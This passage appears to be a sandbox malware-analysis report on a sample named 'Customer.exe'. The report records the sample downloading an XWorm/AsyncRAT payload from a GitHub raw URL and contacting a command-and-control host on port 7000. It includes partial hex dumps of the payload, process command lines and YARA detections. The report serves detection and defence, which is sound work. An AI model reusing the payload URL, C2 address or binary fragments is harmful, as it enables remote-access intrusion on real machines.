                                                                                                    Jan 7, 2025 17:05:52.379779100 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.388247013 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:52.393023014 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.452920914 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.454590082 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:52.459415913 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.550045967 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.551651955 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:52.557895899 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.640585899 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:52.645488977 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.647141933 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.655596018 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:52.706919909 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.708815098 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:52.713639021 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.782785892 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.913621902 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:52.915708065 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:52.918612003 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:52.923491001 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:57.679100037 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:57.679186106 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:57.679291010 CET497377000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:57.681112051 CET500117000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:57.684099913 CET700049737147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:57.686006069 CET700050011147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:05:57.686075926 CET500117000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:57.747895956 CET500117000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:05:57.752795935 CET700050011147.124.210.158192.168.2.4
                                                                                                    Jan 7, 2025 17:06:03.533543110 CET500117000192.168.2.4147.124.210.158
                                                                                                    Jan 7, 2025 17:06:03.538361073 CET700050011147.124.210.158192.168.2.4

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 7, 2025 17:02:05.368328094 CET6152153192.168.2.41.1.1.1
                                                                                                    Jan 7, 2025 17:02:05.374958038 CET53615211.1.1.1192.168.2.4
                                                                                                    Jan 7, 2025 17:02:06.442358971 CET4969253192.168.2.41.1.1.1
                                                                                                    Jan 7, 2025 17:02:06.450037003 CET53496921.1.1.1192.168.2.4

                                                                                                    DNS Queries

                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 7, 2025 17:02:05.368328094 CET192.168.2.41.1.1.10x1a48Standard query (0)github.comA (IP address)IN (0x0001)false
                                                                                                    Jan 7, 2025 17:02:06.442358971 CET192.168.2.41.1.1.10x7497Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false

                                                                                                    DNS Answers

                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Jan 7, 2025 17:02:05.374958038 CET1.1.1.1192.168.2.40x1a48No error (0)github.com140.82.121.4A (IP address)IN (0x0001)false
                                                                                                    Jan 7, 2025 17:02:06.450037003 CET1.1.1.1192.168.2.40x7497No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                                                    Jan 7, 2025 17:02:06.450037003 CET1.1.1.1192.168.2.40x7497No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                                                    Jan 7, 2025 17:02:06.450037003 CET1.1.1.1192.168.2.40x7497No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                                                    Jan 7, 2025 17:02:06.450037003 CET1.1.1.1192.168.2.40x7497No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false

                                                                                                    HTTP Request Dependency Graph

                                                                                                    • github.com
                                                                                                    • raw.githubusercontent.com

                                                                                                    HTTPS Proxied Packets

                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.2.449735140.82.121.44437716C:\Users\user\Desktop\Customer.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-07 16:02:06 UTC215OUTGET /rosarioian181/meeekone/raw/refs/heads/pivoc-pages/XClient.exe HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
                                                                                                    Host: github.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-07 16:02:06 UTC572INHTTP/1.1 302 Found
                                                                                                    Server: GitHub.com
                                                                                                    Date: Tue, 07 Jan 2025 16:02:06 GMT
                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                    Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                    Access-Control-Allow-Origin:
                                                                                                    Location: https://raw.githubusercontent.com/rosarioian181/meeekone/refs/heads/pivoc-pages/XClient.exe
                                                                                                    Cache-Control: no-cache
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                    X-Frame-Options: deny
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-XSS-Protection: 0
                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                    2025-01-07 16:02:06 UTC3382INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f
                                                                                                    Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    1192.168.2.449736185.199.111.1334437716C:\Users\user\Desktop\Customer.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-07 16:02:06 UTC226OUTGET /rosarioian181/meeekone/refs/heads/pivoc-pages/XClient.exe HTTP/1.1
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 6.2; en-CH) WindowsPowerShell/5.1.19041.1682
                                                                                                    Host: raw.githubusercontent.com
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-07 16:02:07 UTC899INHTTP/1.1 200 OK
                                                                                                    Connection: close
                                                                                                    Content-Length: 33792
                                                                                                    Cache-Control: max-age=300
                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                    Content-Type: application/octet-stream
                                                                                                    ETag: "3f6d125f6c6aa75bdc7782a9f823d07fac46a066ee573695de3f913031dc5a68"
                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                    X-Content-Type-Options: nosniff
                                                                                                    X-Frame-Options: deny
                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                    X-GitHub-Request-Id: 9B20:2B7583:678BD8:737B74:677D4FFE
                                                                                                    Accept-Ranges: bytes
                                                                                                    Date: Tue, 07 Jan 2025 16:02:06 GMT
                                                                                                    Via: 1.1 varnish
                                                                                                    X-Served-By: cache-nyc-kteb1890033-NYC
                                                                                                    X-Cache: MISS
                                                                                                    X-Cache-Hits: 0
                                                                                                    X-Timer: S1736265727.988977,VS0,VE8
                                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                                    X-Fastly-Request-ID: a7726e5bea03af8fda8895c94f83cc1076961205
                                                                                                    Expires: Tue, 07 Jan 2025 16:07:06 GMT
                                                                                                    Source-Age: 0
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b4 54 66 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 7a 00 00 00 08 00 00 00 00 00 00 ce 98 00 00 00 20 00 00 00 a0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 00 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTfgz @ @
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 35 73 28 00 00 0a 20 b8 0b 00 00 20 10 27 00 00 6f 29 00 00 0a 28 1f 00 00 0a 7e 0f 00 00 04 2d 0a 28 27 00 00 06 28 19 00 00 06 7e 15 00 00 04 6f 2a 00 00 0a 26 17 2d c8 2a ee 16 80 0f 00 00 04 14 80 10 00 00 04 16 6a 80 11 00 00 04 14 80 13 00 00 04 14 80 14 00 00 04 16 73 2c 00 00 0a 80 15 00 00 04 14 80 16 00 00 04 7e 0a 00 00 04 80 17 00 00 04 2a 1e 02 28 17 00 00 0a 2a 1b 30 06 00 aa 00 00 00 0d 00 00 11 7e 06 00 00 04 17 8d 2c 00 00 01 13 04 11 04 16 1f 2c 9d 11 04 6f 2d 00 00 0a 73 28 00 00 0a 7e 06 00 00 04 17 8d 2c 00 00 01 13 05 11 05 16 1f 2c 9d 11 05 6f 2d 00 00 0a 8e b7 6f 2e 00 00 0a 9a 0a 06 28 42 00 00 06 2c 48 06 28 2f 00 00 0a 0b 07 13 07 16 13 06 2b 2f 11 07 11 06 9a 0c 08 6f 30 00 00 0a 28 1a 00 00 06 26 7e 0f 00 00 04 2c 02 de 1c de
                                                                                                    Data Ascii: 5s( 'o)(~-('(~o*&-*js,~*(*0~,,o-s(~,,o-o.(B,H(/+/o0(&~,
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 00 00 0a de 07 28 23 00 00 0a de 00 06 2a 00 00 01 10 00 00 00 00 00 00 21 21 00 1b 24 00 00 01 1b 30 04 00 cf 00 00 00 13 00 00 11 72 df 01 00 70 28 4e 00 00 0a 72 e5 01 00 70 28 4f 00 00 0a 72 11 02 00 70 73 50 00 00 0a 0b 73 51 00 00 0a 0c 07 6f 52 00 00 0a 6f 53 00 00 0a 13 05 2b 2b 11 05 6f 54 00 00 0a 0d 08 09 72 4f 02 00 70 6f 55 00 00 0a 6f 15 00 00 0a 6f 56 00 00 0a 26 08 72 67 02 00 70 6f 56 00 00 0a 26 11 05 6f 57 00 00 0a 2d cc de 0c 11 05 2c 07 11 05 6f 58 00 00 0a dc 08 6f 59 00 00 0a 6f 5a 00 00 0a 16 33 08 72 6b 02 00 70 0a de 41 08 6f 59 00 00 0a 16 08 6f 5b 00 00 0a 17 da 6f 5c 00 00 0a 0a de 2a de 0a 07 2c 06 07 6f 58 00 00 0a dc de 1c 25 28 21 00 00 0a 13 04 72 6b 02 00 70 0a 28 23 00 00 0a de 07 28 23 00 00 0a de 00 06 2a 00 01 28 00
                                                                                                    Data Ascii: (#*!!$0rp(Nrp(OrpsPsQoRoS++oTrOpoUooV&rgpoV&oW-,oXoYoZ3rkpAoYo[o\*,oX%(!rkp(#(#*(
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 00 0a de 00 2a 00 01 10 00 00 00 00 00 00 08 08 00 0e 24 00 00 01 1b 30 07 00 c9 00 00 00 19 00 00 11 7e 16 00 00 04 13 04 11 04 28 73 00 00 0a 16 13 05 11 04 12 05 28 74 00 00 0a 7e 0f 00 00 04 39 96 00 00 00 73 32 00 00 0a 0a 02 28 4c 00 00 06 28 54 00 00 06 0b 07 8e b7 28 75 00 00 0a 72 47 03 00 70 28 42 00 00 0a 28 4c 00 00 06 0c 06 08 16 08 8e b7 6f 6e 00 00 0a 06 07 16 07 8e b7 6f 6e 00 00 0a 7e 10 00 00 04 15 17 6f 76 00 00 0a 26 7e 10 00 00 04 06 6f 6a 00 00 0a 16 06 6f 6f 00 00 0a b7 16 14 fe 06 26 00 00 06 73 37 00 00 0a 14 6f 77 00 00 0a 26 de 0a 06 2c 06 06 6f 58 00 00 0a dc de 14 25 28 21 00 00 0a 0d 16 80 0f 00 00 04 28 23 00 00 0a de 00 de 0c 11 05 2c 07 11 04 28 78 00 00 0a dc 2a 00 00 00 01 28 00 00 02 00 2a 00 70 9a 00 0a 00 00 00 00 00
                                                                                                    Data Ascii: *$0~(s(t~9s2(L(T(urGp(B(Lonon~ov&~ojoo&s7ow&,oX%(!(#,(x*(*p
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 00 70 16 16 15 28 8c 00 00 0a 26 38 7b 05 00 00 11 13 72 0f 04 00 70 16 28 4a 00 00 0a 16 33 13 72 23 04 00 70 16 16 15 28 8c 00 00 0a 26 38 58 05 00 00 11 13 72 53 04 00 70 16 28 4a 00 00 0a 16 33 13 72 65 04 00 70 16 16 15 28 8c 00 00 0a 26 38 35 05 00 00 11 13 72 85 04 00 70 16 28 4a 00 00 0a 16 33 11 06 17 9a 16 16 15 28 8c 00 00 0a 26 38 14 05 00 00 11 13 72 97 04 00 70 16 28 4a 00 00 0a 16 33 42 7e 1e 00 00 04 6f 8d 00 00 0a de 0e 25 28 21 00 00 0a 0d 28 23 00 00 0a de 00 14 fe 06 3a 00 00 06 73 70 00 00 0a 73 71 00 00 0a 80 1e 00 00 04 7e 1e 00 00 04 06 17 9a 6f 8e 00 00 0a 38 c2 04 00 00 11 13 72 ab 04 00 70 16 28 4a 00 00 0a 16 33 20 7e 1e 00 00 04 6f 8d 00 00 0a de 0f 25 28 21 00 00 0a 13 04 28 23 00 00 0a de 00 38 92 04 00 00 11 13 72 bd 04 00
                                                                                                    Data Ascii: p(&8{rp(J3r#p(&8XrSp(J3rep(&85rp(J3(&8rp(J3B~o%(!(#:spsq~o8rp(J3 ~o%(!(#8r
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 00 00 0a 11 0e 6f a8 00 00 0a de 0c 28 21 00 00 0a 28 23 00 00 0a de 00 de 0f 25 28 21 00 00 0a 13 11 28 23 00 00 0a de 00 de 1b 25 28 21 00 00 0a 13 12 11 12 6f 93 00 00 0a 28 31 00 00 06 28 23 00 00 0a de 00 2a 00 00 00 41 f4 00 00 00 00 00 00 60 01 00 00 1c 00 00 00 7c 01 00 00 0c 00 00 00 24 00 00 01 00 00 00 00 93 02 00 00 0c 00 00 00 9f 02 00 00 0e 00 00 00 24 00 00 01 00 00 00 00 e5 02 00 00 0c 00 00 00 f1 02 00 00 0f 00 00 00 24 00 00 01 00 00 00 00 15 03 00 00 0c 00 00 00 21 03 00 00 0f 00 00 00 24 00 00 01 00 00 00 00 68 03 00 00 0c 00 00 00 74 03 00 00 0f 00 00 00 24 00 00 01 00 00 00 00 45 04 00 00 44 00 00 00 89 04 00 00 48 00 00 00 24 00 00 01 00 00 00 00 27 06 00 00 16 00 00 00 3d 06 00 00 0c 00 00 00 24 00 00 01 00 00 00 00 55 07 00 00 25
                                                                                                    Data Ascii: o(!(#%(!(#%(!o(1(#*A`|$$$!$ht$EDH$'=$U%
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 19 9a 28 83 00 00 0a 28 52 00 00 06 a2 11 09 18 7e 1c 00 00 04 1a 9a a2 11 09 19 7e 1c 00 00 04 1b 9a a2 11 09 1a 7e 1c 00 00 04 1c 9a a2 11 09 a2 11 08 14 14 14 28 ae 00 00 0a 28 20 00 00 0a 28 30 00 00 06 18 80 1d 00 00 04 dd d1 00 00 00 38 85 00 00 00 07 14 72 bd 02 00 70 16 8d 03 00 00 01 14 14 14 28 ae 00 00 0a 72 13 07 00 70 16 28 af 00 00 0a 2c 63 7e 1c 00 00 04 18 9a 28 b3 00 00 0a 2d 55 7e 1d 00 00 04 18 33 4b 17 80 1d 00 00 04 07 14 72 91 06 00 70 18 8d 03 00 00 01 13 08 11 08 16 14 a2 11 08 17 17 8d 03 00 00 01 13 09 11 09 16 28 4e 00 00 06 a2 11 09 a2 11 08 14 14 14 28 ae 00 00 0a 28 20 00 00 0a 28 30 00 00 06 16 80 1d 00 00 04 de 47 11 06 17 d6 13 06 11 06 11 07 8e b7 3f 44 fb ff ff 11 04 17 d6 13 04 11 04 11 05 8e b7 3f 06 fb ff ff de 23 25
                                                                                                    Data Ascii: ((R~~~(( (08rp(rp(,c~(-U~3Krp(N(( (0G?D?#%
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 00 00 0a 72 3b 03 00 70 17 8d 03 00 00 01 0d 09 16 06 28 11 00 00 0a a2 09 13 04 11 04 14 14 17 8d 38 00 00 01 13 05 11 05 16 17 9c 11 05 17 28 72 00 00 0a 26 11 05 16 90 2c 0a 11 04 16 9a 28 11 00 00 0a 0a 2a 1b 30 03 00 5d 00 00 00 26 00 00 11 28 a9 00 00 0a 02 6f aa 00 00 0a 0b 07 6f cf 00 00 0a 0d 07 09 6f ac 00 00 0a 6f d0 00 00 0a 28 11 00 00 0a 0c 17 8d 03 00 00 01 13 04 09 6f d1 00 00 0a 8e b7 16 33 03 14 13 04 09 08 28 11 00 00 0a 11 04 6f d2 00 00 0a 26 de 0f 25 28 21 00 00 0a 13 05 28 23 00 00 0a de 00 06 2a 00 00 00 01 10 00 00 00 00 00 00 4c 4c 00 0f 24 00 00 01 3a 02 28 20 00 00 0a 28 32 00 00 06 2b 00 2a 00 3a 02 28 20 00 00 0a 28 33 00 00 06 2b 00 2a 00 1b 30 05 00 aa 00 00 00 27 00 00 11 18 17 1c 73 31 00 00 0a 0c 08 02 7b 33 00 00 04 02
                                                                                                    Data Ascii: r;p(8(r&,(*0]&(oooo(o3(o&%(!(#*LL$:( (2+*:( (3+*0's1{3
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 00 00 04 7e 29 00 00 04 6c 28 b4 00 00 0a 28 f4 00 00 0a 80 28 00 00 04 2b 0f 28 45 00 00 06 28 75 00 00 0a 80 2a 00 00 04 07 80 29 00 00 04 17 2d b4 06 2a 1b 30 01 00 1a 00 00 00 00 00 00 00 20 03 00 00 80 28 49 00 00 06 26 de 0c 28 21 00 00 0a 28 23 00 00 0a de 00 2a 00 00 01 10 00 00 00 00 00 00 0d 0d 00 0c 24 00 00 01 1b 30 03 00 41 00 00 00 30 00 00 11 20 00 01 00 00 73 ef 00 00 0a 0b 28 47 00 00 06 0c 08 07 20 00 01 00 00 28 48 00 00 06 16 31 09 07 6f 59 00 00 0a 0a de 16 de 0c 28 21 00 00 0a 28 23 00 00 0a de 00 72 0f 03 00 70 0a 2b 00 06 2a 00 00 00 01 10 00 00 00 00 00 00 2b 2b 00 0c 24 00 00 01 13 30 02 00 10 00 00 00 31 00 00 11 28 d3 00 00 0a 02 6f d4 00 00 0a 0a 2b 00 06 2a 13 30 02 00 10 00 00 00 32 00 00 11 28 d3 00 00 0a 02 6f f5 00 00 0a
                                                                                                    Data Ascii: ~)l(((+(E(u*)-*0 (I&(!(#*$0A0 s(G (H1oY(!(#rp+*++$01(o+*02(o
                                                                                                    2025-01-07 16:02:07 UTC1378INData Raw: 90 2c 1f 11 04 16 9a 28 11 00 00 0a d0 09 00 00 1b 28 14 00 00 0a 28 04 01 00 0a 74 09 00 00 1b 10 00 09 14 72 63 0c 00 70 16 8d 03 00 00 01 14 14 14 17 28 72 00 00 0a 26 de 0f 09 2c 0b 09 74 45 00 00 01 6f 58 00 00 0a dc 07 14 72 6f 0c 00 70 16 8d 03 00 00 01 14 14 14 28 ae 00 00 0a 74 09 00 00 1b 0a de 11 de 0f 07 2c 0b 07 74 45 00 00 01 6f 58 00 00 0a dc 06 2a 41 34 00 00 02 00 00 00 81 00 00 00 90 00 00 00 11 01 00 00 0f 00 00 00 00 00 00 00 02 00 00 00 06 00 00 00 39 01 00 00 3f 01 00 00 0f 00 00 00 00 00 00 00 1b 30 04 00 55 00 00 00 39 00 00 11 73 e2 00 00 0a 0a 73 e3 00 00 0a 0c 06 08 7e 09 00 00 04 28 4c 00 00 06 6f e4 00 00 0a 6f e6 00 00 0a 06 18 6f e7 00 00 0a 06 6f 0a 01 00 0a 13 04 02 0d 11 04 09 16 09 8e b7 6f e9 00 00 0a 0b de 11 de 0f 25
                                                                                                    Data Ascii: ,(((trcp(r&,tEoXrop(t,tEoX*A49?0U9ss~(Looooo%


                                                                                                    Statistics

                                                                                                    CPU Usage

                                                                                                    Click to jump to process

                                                                                                    Memory Usage

                                                                                                    Click to jump to process

                                                                                                    High Level Behavior Distribution

                                                                                                    Click to dive into process behavior distribution

                                                                                                    Behavior

                                                                                                    Click to jump to process

                                                                                                    System Behavior

                                                                                                    General

                                                                                                    Target ID:0
                                                                                                    Start time:11:01:53
                                                                                                    Start date:07/01/2025
                                                                                                    Path:C:\Users\user\Desktop\Customer.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\Desktop\Customer.exe"
                                                                                                    Imagebase:0xc50000
                                                                                                    File size:36'352 bytes
                                                                                                    MD5 hash:E22D80DF02163D375FA6A7B08700EB01
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:1
                                                                                                    Start time:11:01:55
                                                                                                    Start date:07/01/2025
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline"
                                                                                                    Imagebase:0x7ff63fd20000
                                                                                                    File size:2'759'232 bytes
                                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:moderate
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:2
                                                                                                    Start time:11:01:55
                                                                                                    Start date:07/01/2025
                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                    File size:862'208 bytes
                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:3
                                                                                                    Start time:11:01:56
                                                                                                    Start date:07/01/2025
                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6040.tmp" "c:\Users\user\AppData\Local\Temp\1ogmnitn\CSC1B46EB8E836240E48C8059BFB557429.TMP"
                                                                                                    Imagebase:0x7ff7aa260000
                                                                                                    File size:52'744 bytes
                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:4
                                                                                                    Start time:11:01:57
                                                                                                    Start date:07/01/2025
                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                    Imagebase:0x7ff693ab0000
                                                                                                    File size:496'640 bytes
                                                                                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:false
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:high
                                                                                                    Has exited:true

                                                                                                    General

                                                                                                    Target ID:6
                                                                                                    Start time:11:02:06
                                                                                                    Start date:07/01/2025
                                                                                                    Path:C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe"
                                                                                                    Imagebase:0xfb0000
                                                                                                    File size:33'792 bytes
                                                                                                    MD5 hash:F2CE039294AD313D2A9A84855C27341D
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Yara matches:
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmp, Author: Joe Security
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000006.00000000.1767864196.0000000000FB2000.00000002.00000001.01000000.0000000D.sdmp, Author: ditekSHen
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000006.00000002.4116258187.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                    • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: Joe Security
                                                                                                    • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: Sekoia.io
                                                                                                    • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe, Author: ditekSHen
                                                                                                    Antivirus matches:
                                                                                                    • Detection: 100%, Avira
                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                    • Detection: 91%, ReversingLabs
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Disassembly

                                                                                                    Reset < >

                                                                                                      Executed Functions

                                                                                                      Function 00007FFD9B98E782 Relevance: 3.8, Instructions: 3837COMMON
                                                                                                      Download Yara Rule
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1781376445.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_7ffd9b980000_Customer.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID:
                                                                                                      • API String ID:
                                                                                                      • Opcode ID: bde4b87d1407400289525443362972c369476f03b318b79eff1ebbcc1f004fff
                                                                                                      • Instruction ID: 71e2e87201c714bda0ba5a81b829a68fcbe006b2142517e98a2ae92079d828b7
                                                                                                      • Opcode Fuzzy Hash: bde4b87d1407400289525443362972c369476f03b318b79eff1ebbcc1f004fff
                                                                                                      • Instruction Fuzzy Hash: 05634B31A2EA8A5FE375C76484726A53BE0EF46310F0605FDC49D8B5F3DA386A0AC751
